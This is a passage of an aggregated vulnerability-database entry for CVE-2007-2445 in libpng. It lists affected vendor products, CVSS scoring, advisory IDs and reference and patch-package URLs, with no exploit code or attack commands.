vendor:debianmodel:linux mipselscope:eqversion:4.0

Trust: 0.3

vendor:debianmodel:linux mipsscope:eqversion:4.0

Trust: 0.3

vendor:redhatmodel:desktopscope:eqversion:4.0

Trust: 0.3

vendor:turbolinuxmodel:homescope: - version: -

Trust: 0.3

vendor:turbolinuxmodel:fujiscope:eqversion:0

Trust: 0.3

vendor:mandrivamodel:linux mandrakescope:eqversion:2007.0

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.5.2

Trust: 0.3

vendor:debianmodel:linuxscope:eqversion:5.0

Trust: 0.3

vendor:linuxmodel:terminal server project linux terminal server projectscope:neversion:5.0

Trust: 0.3

vendor:irrlichtmodel:engine irrlicht enginescope:eqversion:1.1

Trust: 0.3

vendor:mandrakesoftmodel:corporate server x86 64scope:eqversion:3.0

Trust: 0.3

vendor:avayamodel:message networkingscope: - version: -

Trust: 0.3

vendor:redhatmodel:enterprise linux optional productivity application serverscope:eqversion:5

Trust: 0.3

vendor:ubuntumodel:linux lts sparcscope:eqversion:6.06

Trust: 0.3

vendor:mandrakesoftmodel:corporate serverscope:eqversion:4.0

Trust: 0.3

vendor:redhatmodel:enterprise linux virtualization serverscope:eqversion:5

Trust: 0.3

vendor:turbolinuxmodel:appliance server workgroup editionscope:eqversion:1.0

Trust: 0.3

vendor:debianmodel:linux s/390scope:eqversion:4.0

Trust: 0.3

vendor:avayamodel:messaging storage server mssscope:eqversion:3.0

Trust: 0.3

vendor:libpngmodel:libpng3scope:eqversion:1.2.7

Trust: 0.3

vendor:redhatmodel:advanced workstation for the itanium processor ia64scope:eqversion:2.1

Trust: 0.3

vendor:sunmodel:solaris 8 x86scope: - version: -

Trust: 0.3

vendor:redhatmodel:fedora core5scope: - version: -

Trust: 0.3

vendor:debianmodel:linux powerpcscope:eqversion:4.0

Trust: 0.3

vendor:redhatmodel:enterprise linux desktop supplementary clientscope:eqversion:5

Trust: 0.3

vendor:avayamodel:sesscope:eqversion:3.0

Trust: 0.3

vendor:turbolinuxmodel:desktopscope:eqversion:10.0

Trust: 0.3

vendor:debianmodel:linux alphascope:eqversion:5.0

Trust: 0.3

vendor:turbolinuxmodel:serverscope:eqversion:10.0

Trust: 0.3

vendor:redhatmodel:enterprise linux serverscope:eqversion:5

Trust: 0.3

vendor:turbolinuxmodel:f...scope:eqversion:10

Trust: 0.3

vendor:redhatmodel:enterprise linux as ia64scope:eqversion:2.1

Trust: 0.3

vendor:avayamodel:sesscope:eqversion:3.1.1

Trust: 0.3

vendor:sunmodel:solarisscope:eqversion:10

Trust: 0.3

vendor:libpngmodel:libpng3scope:eqversion:1.2.8

Trust: 0.3

vendor:avayamodel:message networking mnscope:eqversion:3.1

Trust: 0.3

vendor:libpngmodel:libpng3scope:eqversion:1.2.0

Trust: 0.3

vendor:redhatmodel:enterprise linux asscope:eqversion:4

Trust: 0.3

vendor:redhatmodel:enterprise linux asscope:eqversion:3

Trust: 0.3

vendor:redhatmodel:fedora core6scope: - version: -

Trust: 0.3

vendor:debianmodel:linux s/390scope:eqversion:5.0

Trust: 0.3

vendor:avayamodel:aura application enablement servicesscope:eqversion:3.1.3

Trust: 0.3

vendor:transsoftmodel:broker ftp serverscope:eqversion:8.0

Trust: 0.3

vendor:debianmodel:linux m68kscope:eqversion:4.0

Trust: 0.3

vendor:debianmodel:linux armscope:eqversion:4.0

Trust: 0.3

vendor:sgimodel:propack sp6scope:eqversion:3.0

Trust: 0.3

vendor:debianmodel:linuxscope:eqversion:4.0

Trust: 0.3

vendor:libpngmodel:libpng3scope:eqversion:1.2.5

Trust: 0.3

vendor:irrlichtmodel:engine irrlicht enginescope:eqversion:1.2

Trust: 0.3

vendor:debianmodel:linux amd64scope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linux ia-64scope:eqversion:4.0

Trust: 0.3

vendor:debianmodel:linux armelscope:eqversion:4.0

Trust: 0.3

vendor:debianmodel:linux sparcscope:eqversion:4.0

Trust: 0.3

vendor:redhatmodel:enterprise linux hardware certificationscope:eqversion:5

Trust: 0.3

vendor:redhatmodel:enterprise linux wsscope:eqversion:4

Trust: 0.3

vendor:redhatmodel:enterprise linux wsscope:eqversion:3

Trust: 0.3

vendor:debianmodel:linux ia-64scope:eqversion:5.0

Trust: 0.3

vendor:sunmodel:solaris 10 x86scope: - version: -

Trust: 0.3

vendor:redhatmodel:desktopscope:eqversion:3.0

Trust: 0.3

vendor:openpkgmodel:currentscope: - version: -

Trust: 0.3

vendor:avayamodel:communication managerscope:eqversion:2.0

Trust: 0.3

vendor:debianmodel:linux hppascope:eqversion:4.0

Trust: 0.3

vendor:redhatmodel:enterprise linux desktop workstation clientscope:eqversion:5

Trust: 0.3

vendor:avayamodel:sesscope:eqversion:2.0

Trust: 0.3

vendor:sunmodel:solaris 9 x86scope: - version: -

Trust: 0.3

vendor:mandrakesoftmodel:corporate serverscope:eqversion:3.0

Trust: 0.3

vendor:debianmodel:linux ia-32scope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linux mipselscope:eqversion:5.0

Trust: 0.3

vendor:ubuntumodel:linux amd64scope:eqversion:7.04

Trust: 0.3

vendor:debianmodel:linux mipsscope:eqversion:5.0

Trust: 0.3

vendor:irrlichtmodel:engine irrlicht enginescope:eqversion:1.3

Trust: 0.3

vendor:avayamodel:messaging storage serverscope:eqversion:1.0

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.2

Trust: 0.3

vendor:turbolinuxmodel:serverscope:eqversion:10.0.0x64

Trust: 0.3

vendor:avayamodel:communication managerscope:eqversion:2.0.1

Trust: 0.3

vendor:redhatmodel:enterprise linux es ia64scope:eqversion:2.1

Trust: 0.3

vendor:redhatmodel:enterprise linux clustering serverscope:eqversion:5

Trust: 0.3

vendor:debianmodel:linux m68kscope:eqversion:5.0

Trust: 0.3

vendor:redhatmodel:enterprise linux asscope:eqversion:2.1

Trust: 0.3

vendor:debianmodel:linux armscope:eqversion:5.0

Trust: 0.3

vendor:turbolinuxmodel:multimediascope: - version: -

Trust: 0.3

vendor:ubuntumodel:linux i386scope:eqversion:7.04

Trust: 0.3

vendor:libpngmodel:libpngscope:eqversion:1.0.24

Trust: 0.3

sources: CERT/CC: VU#684664 // BID: 24000 // BID: 24023 // CNNVD: CNNVD-200705-347 // NVD: CVE-2007-2445

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2007-2445
value: MEDIUM

Trust: 1.0

CARNEGIE MELLON: VU#684664
value: 3.86

Trust: 0.8

CNNVD: CNNVD-200705-347
value: MEDIUM

Trust: 0.6

nvd@nist.gov: CVE-2007-2445
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:N/I:N/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.0

sources: CERT/CC: VU#684664 // CNNVD: CNNVD-200705-347 // NVD: CVE-2007-2445

PROBLEMTYPE DATA

problemtype:NVD-CWE-noinfo

Trust: 1.0

sources: NVD: CVE-2007-2445

THREAT TYPE

remote

Trust: 0.8

sources: PACKETSTORM: 129524 // PACKETSTORM: 57151 // CNNVD: CNNVD-200705-347

TYPE

Design Error

Trust: 1.2

sources: BID: 24000 // BID: 24023 // CNNVD: CNNVD-200705-347

EXTERNAL IDS

db:NVDid:CVE-2007-2445

Trust: 2.8

db:CERT/CCid:VU#684664

Trust: 2.7

db:SECUNIAid:25742

Trust: 2.4

db:SECUNIAid:25353

Trust: 2.4

db:SECUNIAid:25292

Trust: 2.4

db:BIDid:24000

Trust: 1.9

db:BIDid:24023

Trust: 1.9

db:SECUNIAid:25571

Trust: 1.6

db:SECUNIAid:25787

Trust: 1.6

db:SECUNIAid:25329

Trust: 1.6

db:SECUNIAid:25461

Trust: 1.6

db:SECUNIAid:34388

Trust: 1.6

db:SECUNIAid:25268

Trust: 1.6

db:SECUNIAid:30161

Trust: 1.6

db:SECUNIAid:27056

Trust: 1.6

db:SECUNIAid:29420

Trust: 1.6

db:SECUNIAid:25554

Trust: 1.6

db:SECUNIAid:31168

Trust: 1.6

db:SECUNIAid:25273

Trust: 1.6

db:SECUNIAid:25867

Trust: 1.6

db:VUPENid:ADV-2007-1838

Trust: 1.6

db:VUPENid:ADV-2007-2385

Trust: 1.6

db:VUPENid:ADV-2008-0924

Trust: 1.6

db:SECTRACKid:1018078

Trust: 1.6

db:OSVDBid:36196

Trust: 1.0

db:UBUNTUid:USN-472-1

Trust: 0.6

db:GENTOOid:GLSA-200705-24

Trust: 0.6

db:GENTOOid:GLSA-200805-07

Trust: 0.6

db:SUNALERTid:102987

Trust: 0.6

db:SUNALERTid:200871

Trust: 0.6

db:MANDRIVAid:MDKSA-2007:116

Trust: 0.6

db:OPENPKGid:OPENPKG-SA-2007.013

Trust: 0.6

db:XFid:34340

Trust: 0.6

db:DEBIANid:DSA-1613

Trust: 0.6

db:DEBIANid:DSA-1750

Trust: 0.6

db:REDHATid:RHSA-2007:0356

Trust: 0.6

db:APPLEid:APPLE-SA-2008-03-18

Trust: 0.6

db:BUGTRAQid:20070517 FLEA-2007-0018-1: LIBPNG

Trust: 0.6

db:BUGTRAQid:20080304 CORE-2008-0124: MULTIPLE VULNERABILITIES IN GOOGLE'S ANDROID SDK

Trust: 0.6

db:SLACKWAREid:SSA:2007-136-01

Trust: 0.6

db:SUSEid:SUSE-SR:2007:013

Trust: 0.6

db:TRUSTIXid:2007-0019

Trust: 0.6

db:CNNVDid:CNNVD-200705-347

Trust: 0.6

db:PACKETSTORMid:68410

Trust: 0.1

db:PACKETSTORMid:75976

Trust: 0.1

db:PACKETSTORMid:129524

Trust: 0.1

db:PACKETSTORMid:57151

Trust: 0.1

db:PACKETSTORMid:64260

Trust: 0.1

db:PACKETSTORMid:56849

Trust: 0.1

sources: CERT/CC: VU#684664 // BID: 24000 // BID: 24023 // PACKETSTORM: 68410 // PACKETSTORM: 75976 // PACKETSTORM: 129524 // PACKETSTORM: 57151 // PACKETSTORM: 64260 // PACKETSTORM: 56849 // CNNVD: CNNVD-200705-347 // NVD: CVE-2007-2445

REFERENCES

url:http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/l/li/libpng/libpng-1.2.17-advisory.txt

Trust: 3.0

url:http://support.avaya.com/elmodocs2/security/asa-2007-254.htm

Trust: 1.9

url:http://sunsolve.sun.com/search/document.do?assetkey=1-66-200871-1

Trust: 1.9

url:http://sunsolve.sun.com/search/document.do?assetkey=1-26-102987-1

Trust: 1.9

url:http://www.kb.cert.org/vuls/id/684664

Trust: 1.9

url:http://www.coresecurity.com/?action=item&id=2148

Trust: 1.7

url:http://openpkg.com/go/openpkg-sa-2007.013

Trust: 1.7

url:http://sourceforge.net/project/shownotes.php?release_id=508656&group_id=5624

Trust: 1.6

url:http://sourceforge.net/project/shownotes.php?release_id=508653&group_id=5624

Trust: 1.6

url:https://issues.rpath.com/browse/rpl-1381

Trust: 1.6

url:http://www.securitytracker.com/id?1018078

Trust: 1.6

url:http://www.securityfocus.com/bid/24023

Trust: 1.6

url:http://www.securityfocus.com/bid/24000

Trust: 1.6

url:http://www.redhat.com/support/errata/rhsa-2007-0356.html

Trust: 1.6

url:http://www.debian.org/security/2009/dsa-1750

Trust: 1.6

url:http://slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.492650

Trust: 1.6

url:http://secunia.com/advisories/34388

Trust: 1.6

url:http://secunia.com/advisories/25329

Trust: 1.6

url:http://secunia.com/advisories/25292

Trust: 1.6

url:http://secunia.com/advisories/25273

Trust: 1.6

url:http://secunia.com/advisories/25268

Trust: 1.6

url:http://www.ubuntu.com/usn/usn-472-1

Trust: 1.6

url:http://www.trustix.org/errata/2007/0019/

Trust: 1.6

url:http://www.novell.com/linux/security/advisories/2007_13_sr.html

Trust: 1.6

url:http://www.mandriva.com/security/advisories?name=mdksa-2007:116

Trust: 1.6

url:http://www.gentoo.org/security/en/glsa/glsa-200805-07.xml

Trust: 1.6

url:http://www.gentoo.org/security/en/glsa/glsa-200705-24.xml

Trust: 1.6

url:http://www.debian.org/security/2008/dsa-1613

Trust: 1.6

url:http://secunia.com/advisories/31168

Trust: 1.6

url:http://secunia.com/advisories/30161

Trust: 1.6

url:http://secunia.com/advisories/29420

Trust: 1.6

url:http://secunia.com/advisories/27056

Trust: 1.6

url:http://secunia.com/advisories/25867

Trust: 1.6

url:http://secunia.com/advisories/25787

Trust: 1.6

url:http://secunia.com/advisories/25742

Trust: 1.6

url:http://secunia.com/advisories/25571

Trust: 1.6

url:http://secunia.com/advisories/25554

Trust: 1.6

url:http://secunia.com/advisories/25461

Trust: 1.6

url:http://secunia.com/advisories/25353

Trust: 1.6

url:http://lists.apple.com/archives/security-announce/2008/mar/msg00001.html

Trust: 1.6

url:http://irrlicht.sourceforge.net/changes.txt

Trust: 1.6

url:http://docs.info.apple.com/article.html?artnum=307562

Trust: 1.6

url:http://android-developers.blogspot.com/2008/03/android-sdk-update-m5-rc15-released.html

Trust: 1.0

url:http://osvdb.org/36196

Trust: 1.0

url:http://www.securityfocus.com/archive/1/468910/100/0/threaded

Trust: 1.0

url:http://www.securityfocus.com/archive/1/489135/100/0/threaded

Trust: 1.0

url:http://www.vupen.com/english/advisories/2007/1838

Trust: 1.0

url:http://www.vupen.com/english/advisories/2007/2385

Trust: 1.0

url:http://www.vupen.com/english/advisories/2008/0924/references

Trust: 1.0

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/34340

Trust: 1.0

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10094

Trust: 1.0

url:http://sourceforge.net/project/showfiles.php?group_id=5624

Trust: 0.8

url:http://secunia.com/advisories/25292/

Trust: 0.8

url:http://secunia.com/advisories/25353/

Trust: 0.8

url:http://secunia.com/advisories/25742/

Trust: 0.8

url:http://www.libpng.org/pub/png/libpng.html

Trust: 0.7

url:https://nvd.nist.gov/vuln/detail/cve-2007-2445

Trust: 0.6

url:http://xforce.iss.net/xforce/xfdb/34340

Trust: 0.6

url:http://www.securityfocus.com/archive/1/archive/1/468910/100/0/threaded

Trust: 0.6

url:http://www.frsirt.com/english/advisories/2007/1838

Trust: 0.6

url:http://www.securityfocus.com/archive/1/archive/1/489135/100/0/threaded

Trust: 0.6

url:http://www.frsirt.com/english/advisories/2008/0924/references

Trust: 0.6

url:http://www.frsirt.com/english/advisories/2007/2385

Trust: 0.6

url:http://irrlicht.sourceforge.net

Trust: 0.3

url:/archive/1/491868

Trust: 0.3

url:http://rhn.redhat.com/errata/rhsa-2007-0356.html

Trust: 0.3

url:https://nvd.nist.gov/vuln/detail/cve-2007-5269

Trust: 0.3

url:http://www.debian.org/security/faq

Trust: 0.2

url:http://packages.debian.org/<pkg>

Trust: 0.2

url:http://security.debian.org/

Trust: 0.2

url:http://www.debian.org/security/

Trust: 0.2

url:https://nvd.nist.gov/vuln/detail/cve-2007-5266

Trust: 0.2

url:https://nvd.nist.gov/vuln/detail/cve-2007-5268

Trust: 0.2

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.33-5.2etch1.diff.gz

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_powerpc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_mipsel.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_i386.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_sparc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_sparc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_hppa.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_ia64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_mips.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_mipsel.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_hppa.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_sparc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_mips.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.33.orig.tar.gz

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_amd64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_i386.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_alpha.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_alpha.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_s390.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_s390.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_arm.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_i386.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_mips.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_s390.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_ia64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_powerpc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_mipsel.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_i386.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_ia64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_alpha.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_ia64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_amd64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_mips.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_mips.deb

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2007-3476

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2007-3477

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_powerpc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_s390.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_powerpc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_sparc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_amd64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_arm.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_arm.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_ia64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_s390.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_amd64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_mipsel.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_hppa.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_alpha.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_powerpc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.33-5.2etch1.dsc

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_sparc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_arm.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_arm.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_hppa.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_hppa.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_amd64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_alpha.deb

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2007-3996

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_i386.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_mipsel.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_sparc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_amd64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_arm.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_hppa.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_s390.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_i386.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_i386.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_powerpc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_sparc.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_i386.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mips.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_powerpc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_ia64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_hppa.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_powerpc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_alpha.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mips.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_arm.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_amd64.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_arm.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_s390.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_i386.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mipsel.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_powerpc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mips.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_hppa.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_armel.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_sparc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mips.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_sparc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny2_all.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mips.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_s390.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_alpha.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_s390.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_hppa.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_arm.deb

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2008-1382

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_armel.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_alpha.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_amd64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_arm.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_alpha.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.15~beta5-1+etch2_all.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mipsel.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_sparc.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_sparc.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_alpha.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_hppa.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mips.deb

Trust: 0.1

